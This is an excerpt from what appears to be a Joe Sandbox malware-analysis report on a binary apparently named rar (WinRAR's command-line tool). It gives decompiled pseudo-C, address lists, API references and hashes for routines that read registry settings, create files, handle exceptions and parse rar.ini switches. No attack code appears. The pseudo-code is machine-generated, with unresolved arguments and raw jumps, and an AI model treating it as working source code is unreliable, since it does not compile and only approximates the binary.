				void* _t78;
				void* _t79;
				signed long long _t80;
				void* _t85;
				void* _t86;

				_t78 = _t79 - 0x1f60;
				E00007FF67FF650B69CB0(0x2060, __rax, _t85, _t86);
				_t80 = _t79 - __rax;
				_t48 =  *0x50b978f0; // 0x27db226282f1
				 *(_t78 + 0x1f50) = _t48 ^ _t80;
				_t76 = __rdx;
				if (__rdx == __rcx) goto 0x50b5435e;
				E00007FF67FF650B5A390(__rdx, __rcx, __r8);
				r9d = 1;
				r8d = 0;
				 *((long long*)(_t80 + 0x20)) = _t80 + 0x38;
				_t26 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				r15d = 0;
				if (_t26 != 0) goto 0x50b54450;
				if ( *__rcx != r15w) goto 0x50b54394;
				 *((intOrPtr*)(_t80 + 0x30)) = 0x7ff - __ecx + 0x7ff - __ecx;
				r8d = 0;
				 *((long long*)(_t80 + 0x28)) = _t80 + 0x30;
				 *((long long*)(_t80 + 0x20)) = _t78 + 0xf50;
				if (RegQueryValueExW(??, ??, ??, ??, ??, ??) != 0) goto 0x50b54445;
				r8d = 0x800;
				 *((intOrPtr*)(_t80 + 0x50)) = r15w;
				E00007FF67FF650B4511C(E00007FF67FF650B43538(ExpandEnvironmentStringsW(??, ??, ??), _t80 + 0x50, _t80 + 0x50, __r8), _t78 + 0xf50, __rcx);
				r8d = 0x800;
				E00007FF67FF650B5A368(_t78 + 0xf50, _t80 + 0x50, __r8);
				if (E00007FF67FF650B3345C() == 0) goto 0x50b54445;
				E00007FF67FF650B5A390(_t76, _t80 + 0x50, __r8);
				return E00007FF67FF650B69D10(RegCloseKey(??), __ecx,  *(_t78 + 0x1f50) ^ _t80);
			}











                                                                                                            0x7ff650b5431f
                                                                                                            0x7ff650b5432c
                                                                                                            0x7ff650b54331
                                                                                                            0x7ff650b54334
                                                                                                            0x7ff650b5433e
                                                                                                            0x7ff650b54348
                                                                                                            0x7ff650b54351
                                                                                                            0x7ff650b54359
                                                                                                            0x7ff650b54363
                                                                                                            0x7ff650b54369
                                                                                                            0x7ff650b5436c
                                                                                                            0x7ff650b5437f
                                                                                                            0x7ff650b54385
                                                                                                            0x7ff650b5438a
                                                                                                            0x7ff650b5439c
                                                                                                            0x7ff650b543b8
                                                                                                            0x7ff650b543bc
                                                                                                            0x7ff650b543c4
                                                                                                            0x7ff650b543d0
                                                                                                            0x7ff650b543dd
                                                                                                            0x7ff650b543df
                                                                                                            0x7ff650b543e5
                                                                                                            0x7ff650b5440f
                                                                                                            0x7ff650b5441c
                                                                                                            0x7ff650b54422
                                                                                                            0x7ff650b54433
                                                                                                            0x7ff650b54440
                                                                                                            0x7ff650b5446c

                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(?,00000000,?,?,?,00007FF650B54501,?,?,?,00007FF650B48097), ref: 00007FF650B5437F
                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,?,?,?,00007FF650B54501,?,?,?,00007FF650B48097), ref: 00007FF650B543D5
                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,00007FF650B54501,?,?,?,00007FF650B48097), ref: 00007FF650B543F7
                                                                                                            • RegCloseKey.ADVAPI32(?,00000000,?,?,?,00007FF650B54501,?,?,?,00007FF650B48097), ref: 00007FF650B5444A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                            • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                            • API String ID: 1800380464-3408810217
                                                                                                            • Opcode ID: 01752016598a2439015d38c9ee13ec536d2662fa12a81403865c076236ae7802
                                                                                                            • Instruction ID: 57bf9d9da7b4a97a3d7cd248fbb561f2d0877fab45464e30142a829ab4d6baea
                                                                                                            • Opcode Fuzzy Hash: 01752016598a2439015d38c9ee13ec536d2662fa12a81403865c076236ae7802
                                                                                                            • Instruction Fuzzy Hash: 3331B626718A8765EB60DF21E8902F96350FF467E4F480231EE4E97B99EF6DD144CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B321C0 Relevance: 7.6, APIs: 5, Instructions: 121filetimeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1730 7ff650b321c0-7ff650b321fc call 7ff650b69cb0 1733 7ff650b32209 1730->1733 1734 7ff650b321fe-7ff650b32202 1730->1734 1736 7ff650b3220c-7ff650b32280 CreateFileW 1733->1736 1734->1733 1735 7ff650b32204-7ff650b32207 1734->1735 1735->1736 1737 7ff650b322e0-7ff650b322e4 1736->1737 1738 7ff650b32282-7ff650b3229f GetLastError call 7ff650b44664 1736->1738 1739 7ff650b322e9-7ff650b322ed 1737->1739 1744 7ff650b322f1 1738->1744 1745 7ff650b322a1-7ff650b322de CreateFileW GetLastError 1738->1745 1742 7ff650b322ef 1739->1742 1743 7ff650b32304-7ff650b32308 1739->1743 1746 7ff650b322f6-7ff650b322f8 1742->1746 1747 7ff650b3230a-7ff650b3230e 1743->1747 1748 7ff650b3232e-7ff650b32342 1743->1748 1744->1746 1745->1739 1746->1743 1749 7ff650b322fa 1746->1749 1747->1748 1750 7ff650b32310-7ff650b32328 SetFileTime 1747->1750 1751 7ff650b3235e-7ff650b32387 call 7ff650b69d10 1748->1751 1752 7ff650b32344-7ff650b3235a call 7ff650b5a390 1748->1752 1749->1743 1750->1748 1752->1751
                                                                                                            C-Code - Quality: 21%
                                                                                                            			E00007FF67FF650B321C0(void* __rax, long long __rbx, void* __rcx, void* __rdx, signed int _a8, signed int _a24, signed int _a28, long long _a32, char _a40, signed int _a4136, void* _a4224) {
				intOrPtr _v0;
				intOrPtr _v8;
				long _t39;
				signed int _t42;
				signed int _t43;
				void* _t58;
				void* _t63;
				void* _t77;
				signed long long _t80;
				signed long long _t81;
				signed long long _t97;
				void* _t98;
				void* _t99;
				void* _t102;
				void* _t104;
				void* _t105;

				_a32 = __rbx;
				E00007FF67FF650B69CB0(0x1060, __rax, _t104, _t105);
				_t80 =  *0x50b978f0; // 0x27db226282f1
				_t81 = _t80 ^ _t99 - __rax;
				_a4136 = _t81;
				 *(__rcx + 0x103c) =  *(__rcx + 0x103c) & 0x00000000;
				_t98 = __rdx;
				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x50b32209;
				if ((r8b & 0x00000004) != 0) goto 0x50b32209;
				r9b = 0;
				goto 0x50b3220c;
				r9b = 1;
				asm("bts edx, 0x1e");
				_t58 =  ==  ? ( !(r8d >> 1) & 0x00000001) + 1 << 0x1e : ( !(r8d >> 1) & 0x00000001) + 1 << 0x1e;
				r8d = r8d >> 3;
				r8d =  !r8d;
				r15d = _t58;
				r8d = r8d & 0x00000001;
				r14d = r8d;
				r14d = r14d | 0x00000002;
				r14d =  ==  ? r8d : r14d;
				asm("inc ecx");
				r8d = r14d;
				r15d =  ==  ? _t58 : r15d;
				_a8 = _a8 & 0x00000000;
				_v0 = 0x8000000;
				r9d = 0;
				_v8 = 3;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				if (_t81 != 0xffffffff) goto 0x50b322e0;
				_t39 = GetLastError();
				r8d = 0x800;
				if (E00007FF67FF650B44664(_t81, __rcx, __rdx,  &_a40, _t102) == 0) goto 0x50b322f1;
				_a8 = _a8 & 0x00000000;
				_v0 = 0x8000000;
				r9d = 0;
				r8d = r14d;
				_v8 = 3;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				_t97 = _t81;
				_t42 = GetLastError();
				_t63 =  ==  ? 2 : _t39;
				goto 0x50b322e9;
				if (_t97 != 0xffffffff) goto 0x50b32304;
				goto 0x50b322f6;
				if (_a24 != 2) goto 0x50b32304;
				 *(__rcx + 0x103c) = 1;
				if ( *((char*)(__rcx + 0x28)) == 0) goto 0x50b3232e;
				if (_t97 == 0xffffffff) goto 0x50b3232e;
				_t43 = _t42 | 0xffffffff;
				r9d = 0;
				_a24 = _t43;
				_a28 = _t43;
				SetFileTime(??, ??, ??, ??);
				 *(__rcx + 0x14) =  *(__rcx + 0x14) & 0x00000000;
				_t77 = _t97 - 0xffffffff;
				 *((char*)(__rcx + 0x20)) = 0;
				 *((char*)(__rcx + 0x19)) = 0;
				sil = _t77 != 0;
				if (_t77 == 0) goto 0x50b3235e;
				 *(__rcx + 8) = _t97;
				r8d = 0x800;
				E00007FF67FF650B5A390(__rcx + 0x3a, _t98,  &_a24);
				 *((char*)(__rcx + 0x29)) = 0;
				return E00007FF67FF650B69D10(sil, 2, _a4136 ^ _t99 - __rax);
			}



















                                                                                                            0x7ff650b321c0
                                                                                                            0x7ff650b321d1
                                                                                                            0x7ff650b321d9
                                                                                                            0x7ff650b321e0
                                                                                                            0x7ff650b321e3
                                                                                                            0x7ff650b321eb
                                                                                                            0x7ff650b321f2
                                                                                                            0x7ff650b321fc
                                                                                                            0x7ff650b32202
                                                                                                            0x7ff650b32204
                                                                                                            0x7ff650b32207
                                                                                                            0x7ff650b32209
                                                                                                            0x7ff650b3221d
                                                                                                            0x7ff650b32225
                                                                                                            0x7ff650b32228
                                                                                                            0x7ff650b3222c
                                                                                                            0x7ff650b3222f
                                                                                                            0x7ff650b32232
                                                                                                            0x7ff650b32239
                                                                                                            0x7ff650b3223c
                                                                                                            0x7ff650b32243
                                                                                                            0x7ff650b32247
                                                                                                            0x7ff650b32250
                                                                                                            0x7ff650b32253
                                                                                                            0x7ff650b32257
                                                                                                            0x7ff650b3225d
                                                                                                            0x7ff650b32268
                                                                                                            0x7ff650b3226b
                                                                                                            0x7ff650b32273
                                                                                                            0x7ff650b32280
                                                                                                            0x7ff650b32282
                                                                                                            0x7ff650b32288
                                                                                                            0x7ff650b3229f
                                                                                                            0x7ff650b322a1
                                                                                                            0x7ff650b322ac
                                                                                                            0x7ff650b322b4
                                                                                                            0x7ff650b322b7
                                                                                                            0x7ff650b322ba
                                                                                                            0x7ff650b322c5
                                                                                                            0x7ff650b322cb
                                                                                                            0x7ff650b322ce
                                                                                                            0x7ff650b322db
                                                                                                            0x7ff650b322de
                                                                                                            0x7ff650b322ed
                                                                                                            0x7ff650b322ef
                                                                                                            0x7ff650b322f8
                                                                                                            0x7ff650b322fa
                                                                                                            0x7ff650b32308
                                                                                                            0x7ff650b3230e
                                                                                                            0x7ff650b32310
                                                                                                            0x7ff650b32318
                                                                                                            0x7ff650b3231b
                                                                                                            0x7ff650b32321
                                                                                                            0x7ff650b32328
                                                                                                            0x7ff650b3232e
                                                                                                            0x7ff650b32332
                                                                                                            0x7ff650b32336
                                                                                                            0x7ff650b3233a
                                                                                                            0x7ff650b3233e
                                                                                                            0x7ff650b32342
                                                                                                            0x7ff650b32348
                                                                                                            0x7ff650b3234c
                                                                                                            0x7ff650b32355
                                                                                                            0x7ff650b3235a
                                                                                                            0x7ff650b32387

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateErrorLast$Time
                                                                                                            • String ID:
                                                                                                            • API String ID: 1999340476-0
                                                                                                            • Opcode ID: 2e6b9e84340ee10e0157627cda9a2a08b1dc94643019d4fc8bddf9fcc795fdc8
                                                                                                            • Instruction ID: 3f59ca75714bec453be564f3f4d24b8254b128ebc1aa945f92338454943bb0d4
                                                                                                            • Opcode Fuzzy Hash: 2e6b9e84340ee10e0157627cda9a2a08b1dc94643019d4fc8bddf9fcc795fdc8
                                                                                                            • Instruction Fuzzy Hash: D3414B72A0828256FB648B25D8453BA3790EB46BB8F280335DE6F577C4CF7EC4448B44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6D93C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1785 7ff650b6d93c-7ff650b6d989 call 7ff650b6e934 call 7ff650b6c8f0 1790 7ff650b6d98b-7ff650b6d991 1785->1790 1791 7ff650b6d9b6-7ff650b6d9ba 1785->1791 1790->1791 1792 7ff650b6d993-7ff650b6d996 1790->1792 1793 7ff650b6dada-7ff650b6daef call 7ff650b6dc4c 1791->1793 1794 7ff650b6d9c0-7ff650b6d9c3 1791->1794 1796 7ff650b6d9a8-7ff650b6d9ab 1792->1796 1797 7ff650b6d998-7ff650b6d99c 1792->1797 1806 7ff650b6dafa-7ff650b6db00 1793->1806 1807 7ff650b6daf1-7ff650b6daf4 1793->1807 1798 7ff650b6dba8 1794->1798 1799 7ff650b6d9c9-7ff650b6d9f9 1794->1799 1796->1791 1802 7ff650b6d9ad-7ff650b6d9b0 1796->1802 1797->1802 1803 7ff650b6d99e-7ff650b6d9a6 1797->1803 1800 7ff650b6dbad-7ff650b6dbc9 1798->1800 1799->1798 1804 7ff650b6d9ff-7ff650b6da06 1799->1804 1802->1791 1802->1798 1803->1791 1803->1796 1804->1798 1805 7ff650b6da0c-7ff650b6da10 1804->1805 1808 7ff650b6da16-7ff650b6da19 1805->1808 1809 7ff650b6dac7-7ff650b6dad0 call 7ff650b6b388 1805->1809 1810 7ff650b6db02-7ff650b6db06 1806->1810 1811 7ff650b6db6f-7ff650b6dba3 call 7ff650b6cecc 1806->1811 1807->1798 1807->1806 1813 7ff650b6da1b-7ff650b6da30 call 7ff650b6ca40 1808->1813 1814 7ff650b6da7e-7ff650b6da81 1808->1814 1817 7ff650b6dad5 1809->1817 1810->1811 1816 7ff650b6db08-7ff650b6db0f 1810->1816 1811->1798 1823 7ff650b6dbca-7ff650b6dbcf call 7ff650b7489c 1813->1823 1825 7ff650b6da36-7ff650b6da39 1813->1825 1814->1809 1820 7ff650b6da83-7ff650b6da8b 1814->1820 1816->1811 1819 7ff650b6db11-7ff650b6db18 1816->1819 1817->1798 1819->1811 1822 7ff650b6db1a-7ff650b6db2d call 7ff650b6b8d4 1819->1822 1820->1823 1824 7ff650b6da91-7ff650b6dabb 1820->1824 1822->1811 1836 7ff650b6db2f-7ff650b6db6d 1822->1836 1824->1823 1828 7ff650b6dac1-7ff650b6dac5 1824->1828 1830 7ff650b6da3b-7ff650b6da60 1825->1830 1831 7ff650b6da62-7ff650b6da65 1825->1831 1829 7ff650b6da6e-7ff650b6da79 call 7ff650b6e21c 1828->1829 1829->1798 1830->1831 1831->1823 1834 7ff650b6da6b 1831->1834 1834->1829 1836->1800
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00007FF67FF650B6D93C(void* __ebp, void* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				void* _t73;
				intOrPtr _t78;
				unsigned int _t103;
				void* _t131;
				intOrPtr _t135;
				intOrPtr* _t139;
				signed char* _t143;
				void* _t144;
				void* _t169;
				signed char* _t170;
				long long _t174;
				void* _t175;
				void* _t177;
				void* _t178;
				void* _t193;
				void* _t194;
				void* _t196;

				_t131 = __rax;
				 *((long long*)(_t177 + 8)) = __rbx;
				 *((long long*)(_t177 + 0x10)) = _t174;
				 *((long long*)(_t177 + 0x18)) = __rsi;
				_t178 = _t177 - 0x80;
				_t139 = __rcx;
				_t175 = __r9;
				_t194 = __rdx;
				E00007FF67FF650B6E934(_t73, __r8);
				E00007FF67FF650B6C8F0(_t131);
				_t170 =  *((intOrPtr*)(_t178 + 0xc0));
				r8d = 0x80000029;
				r9d = 0x80000026;
				if ( *((intOrPtr*)(_t131 + 0x40)) != 0) goto 0x50b6d9b6;
				if ( *__rcx == 0xe06d7363) goto 0x50b6d9b6;
				if ( *__rcx != r8d) goto 0x50b6d9a8;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x50b6d9ad;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x50b6d9b6;
				if ( *__rcx == r9d) goto 0x50b6d9b6;
				if (( *_t170 & 0x00000020) != 0) goto 0x50b6dba8;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x50b6dada;
				if (_t170[8] == 0) goto 0x50b6dba8;
				if ( *(_t170[8] +  *((intOrPtr*)(__r9 + 8)) -  *((char*)(__r8 + 0x7ff650b85e20)) - 4) >>  *(__r8 + 0x7ff650b85e30) == 0) goto 0x50b6dba8;
				if ( *((intOrPtr*)(_t178 + 0xc8)) != 0) goto 0x50b6dba8;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x50b6dac7;
				if ( *__rcx != r9d) goto 0x50b6da7e;
				_t143 = _t170;
				_t78 = E00007FF67FF650B6CA40(__ebp, __rcx, _t143, __r9, _t170, __rsi, __r9,  *((intOrPtr*)(__r9 + 0x20)), _t196, _t193);
				r9d = _t78;
				if (_t78 - 0xffffffff < 0) goto 0x50b6dbca;
				if (_t170[8] == 0) goto 0x50b6da62;
				_t103 =  *(_t170[8] +  *((intOrPtr*)(_t175 + 8)) - _t143[0x7ff650b85e20] - 4) >> _t143[0x7ff650b85e30];
				if (r9d - _t103 >= 0) goto 0x50b6dbca;
				_t144 = _t194;
				E00007FF67FF650B6E21C(__ebp, r9d - _t103, _t144, _t175, _t175, _t170);
				goto 0x50b6dba8;
				if ( *__rcx != r8d) goto 0x50b6dac7;
				r9d =  *((intOrPtr*)(__rcx + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x50b6dbca;
				if (r9d -  *(_t170[8] +  *((intOrPtr*)(_t175 + 8)) -  *((char*)(_t144 + 0x7ff650b85e20)) - 4) >>  *(_t144 + 0x7ff650b85e30) >= 0) goto 0x50b6dbca;
				goto 0x50b6da6e;
				E00007FF67FF650B6B388( *((char*)(_t144 + 0x7ff650b85e20)), _t194, _t170); // executed
				goto 0x50b6dba8;
				E00007FF67FF650B6DC4C(_t178 + 0x50, _t170,  *((intOrPtr*)(_t175 + 8)));
				if ( *((intOrPtr*)(_t178 + 0x50)) != _t103) goto 0x50b6dafa;
				if (( *_t170 & 0x00000040) == 0) goto 0x50b6dba8;
				if ( *_t139 != 0xe06d7363) goto 0x50b6db6f;
				if ( *((intOrPtr*)(_t139 + 0x18)) - 3 < 0) goto 0x50b6db6f;
				if ( *((intOrPtr*)(_t139 + 0x20)) - 0x19930522 <= 0) goto 0x50b6db6f;
				_t135 =  *((intOrPtr*)(_t139 + 0x30));
				if ( *((intOrPtr*)(_t135 + 8)) == _t103) goto 0x50b6db6f;
				E00007FF67FF650B6B8D4(_t135);
				if (_t135 +  *((intOrPtr*)( *((intOrPtr*)(_t139 + 0x30)) + 8)) == 0) goto 0x50b6db6f;
				 *(_t178 + 0x38) =  *(_t178 + 0xd8) & 0x000000ff;
				 *((long long*)(_t178 + 0x30)) =  *((intOrPtr*)(_t178 + 0xd0));
				 *((intOrPtr*)(_t178 + 0x28)) =  *((intOrPtr*)(_t178 + 0xc8));
				 *(_t178 + 0x20) = _t170;
				 *0x50b80550(_t169);
				goto 0x50b6dbad;
				 *(_t178 + 0x38) =  *((intOrPtr*)(_t178 + 0xd0));
				 *((intOrPtr*)(_t178 + 0x30)) =  *((intOrPtr*)(_t178 + 0xc8));
				 *((char*)(_t178 + 0x28)) =  *(_t178 + 0xd8);
				 *(_t178 + 0x20) = _t170;
				E00007FF67FF650B6CECC(__ebp, _t135 +  *((intOrPtr*)( *((intOrPtr*)(_t139 + 0x30)) + 8)), _t139, _t194, 0x7ff650b10000, _t175); // executed
				return 1;
			}





















                                                                                                            0x7ff650b6d93c
                                                                                                            0x7ff650b6d93c
                                                                                                            0x7ff650b6d941
                                                                                                            0x7ff650b6d946
                                                                                                            0x7ff650b6d950
                                                                                                            0x7ff650b6d957
                                                                                                            0x7ff650b6d95a
                                                                                                            0x7ff650b6d963
                                                                                                            0x7ff650b6d966
                                                                                                            0x7ff650b6d96b
                                                                                                            0x7ff650b6d970
                                                                                                            0x7ff650b6d97a
                                                                                                            0x7ff650b6d980
                                                                                                            0x7ff650b6d989
                                                                                                            0x7ff650b6d991
                                                                                                            0x7ff650b6d996
                                                                                                            0x7ff650b6d99c
                                                                                                            0x7ff650b6d9a6
                                                                                                            0x7ff650b6d9ab
                                                                                                            0x7ff650b6d9b0
                                                                                                            0x7ff650b6d9ba
                                                                                                            0x7ff650b6d9c3
                                                                                                            0x7ff650b6d9f9
                                                                                                            0x7ff650b6da06
                                                                                                            0x7ff650b6da10
                                                                                                            0x7ff650b6da19
                                                                                                            0x7ff650b6da22
                                                                                                            0x7ff650b6da25
                                                                                                            0x7ff650b6da2a
                                                                                                            0x7ff650b6da30
                                                                                                            0x7ff650b6da39
                                                                                                            0x7ff650b6da60
                                                                                                            0x7ff650b6da65
                                                                                                            0x7ff650b6da6b
                                                                                                            0x7ff650b6da74
                                                                                                            0x7ff650b6da79
                                                                                                            0x7ff650b6da81
                                                                                                            0x7ff650b6da83
                                                                                                            0x7ff650b6da8b
                                                                                                            0x7ff650b6dabb
                                                                                                            0x7ff650b6dac5
                                                                                                            0x7ff650b6dad0
                                                                                                            0x7ff650b6dad5
                                                                                                            0x7ff650b6dae6
                                                                                                            0x7ff650b6daef
                                                                                                            0x7ff650b6daf4
                                                                                                            0x7ff650b6db00
                                                                                                            0x7ff650b6db06
                                                                                                            0x7ff650b6db0f
                                                                                                            0x7ff650b6db11
                                                                                                            0x7ff650b6db18
                                                                                                            0x7ff650b6db1a
                                                                                                            0x7ff650b6db2d
                                                                                                            0x7ff650b6db44
                                                                                                            0x7ff650b6db53
                                                                                                            0x7ff650b6db5b
                                                                                                            0x7ff650b6db62
                                                                                                            0x7ff650b6db67
                                                                                                            0x7ff650b6db6d
                                                                                                            0x7ff650b6db7a
                                                                                                            0x7ff650b6db8c
                                                                                                            0x7ff650b6db9a
                                                                                                            0x7ff650b6db9e
                                                                                                            0x7ff650b6dba3
                                                                                                            0x7ff650b6dbc9

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __except_validate_context_recordabort
                                                                                                            • String ID: csm$csm
                                                                                                            • API String ID: 746414643-3733052814
                                                                                                            • Opcode ID: cde82e0f43d60b88cd490d6fb5fa3e4ee964ed1ddc843822b108cdd425cd90c3
                                                                                                            • Instruction ID: 17d401d037c0e0cb9383837ee02db0276c0ea0a72637ab8cbdbedbb15d5d1c09
                                                                                                            • Opcode Fuzzy Hash: cde82e0f43d60b88cd490d6fb5fa3e4ee964ed1ddc843822b108cdd425cd90c3
                                                                                                            • Instruction Fuzzy Hash: E671CF32A08AE296D7608F2594807797BA1FB46B85F0D8131DE4EA7B89CF3ED551CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B269F4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E00007FF67FF650B269F4(void* __edi, void* __esi, long long __rbx, void* __rcx, signed int __rdi, long long __rsi, void* __r9) {
				void* _t36;
				void* _t41;
				void* _t43;
				void* _t49;
				void* _t55;
				void* _t58;
				void* _t59;
				void* _t66;
				signed long long _t73;
				signed long long _t74;
				void* _t75;
				signed short* _t78;
				void* _t106;
				void* _t109;
				void* _t111;
				signed long long _t112;
				void* _t114;
				void* _t119;
				intOrPtr* _t122;
				void* _t124;

				_t117 = __r9;
				_t101 = __rdi;
				_t58 = __edi;
				 *((long long*)(_t111 + 0x10)) = __rbx;
				 *((long long*)(_t111 + 0x18)) = __rsi;
				 *((long long*)(_t111 + 0x20)) = __rdi;
				_t109 = _t111 - 0x70;
				_t112 = _t111 - 0x170;
				_t73 =  *0x50b978f0; // 0x27db226282f1
				_t74 = _t73 ^ _t112;
				 *(_t109 + 0x60) = _t74;
				_t106 = __rcx;
				E00007FF67FF650B5A3C4(_t74, _t112 + 0x40);
				r15d = 0;
				 *((intOrPtr*)(_t112 + 0x38)) = r15b;
				 *((intOrPtr*)(_t112 + 0x30)) = r15b;
				 *((intOrPtr*)(_t112 + 0x28)) = r15b;
				 *((intOrPtr*)(_t112 + 0x20)) = r15d;
				r9d = 0;
				r8b = 1;
				_t36 = E00007FF67FF650B34400(_t49, _t55, __esi, _t74, __rbx, L"rar.ini", _t112 + 0x40, _t114, __r9, _t119); // executed
				if (_t36 == 0) goto 0x50b26b7a;
				E00007FF67FF650B5A464();
				if (_t74 == 0) goto 0x50b26b7a;
				_t122 = __rcx + 0x952a;
				goto 0x50b26a89;
				_t78 = _t74 + 2;
				if (E00007FF67FF650B59F50( *_t78 & 0x0000ffff) != 0) goto 0x50b26a85;
				r8d = 9;
				if (E00007FF67FF650B5D648(_t38,  *_t78 & 0x0000ffff, _t74, _t78, L"switches=", _t114) != 0) goto 0x50b26aba;
				_t14 =  &(_t78[9]); // 0x12
				E00007FF67FF650B2695C( *_t78 & 0x0000ffff, _t58, __esi, _t78, _t106, _t14, _t106, _t117);
				if ( *_t122 == r15w) goto 0x50b26b64;
				r8d = 0x10;
				_t41 = E00007FF67FF650B5A390(_t109, _t122, _t114);
				E00007FF67FF650B5D5F4();
				_t59 = _t41;
				E00007FF67FF650B5D5F4();
				_t16 = _t101 - 0x49; // -73
				_t66 = _t16 - 0xd;
				if (_t66 > 0) goto 0x50b26b02;
				asm("bt edx, ecx");
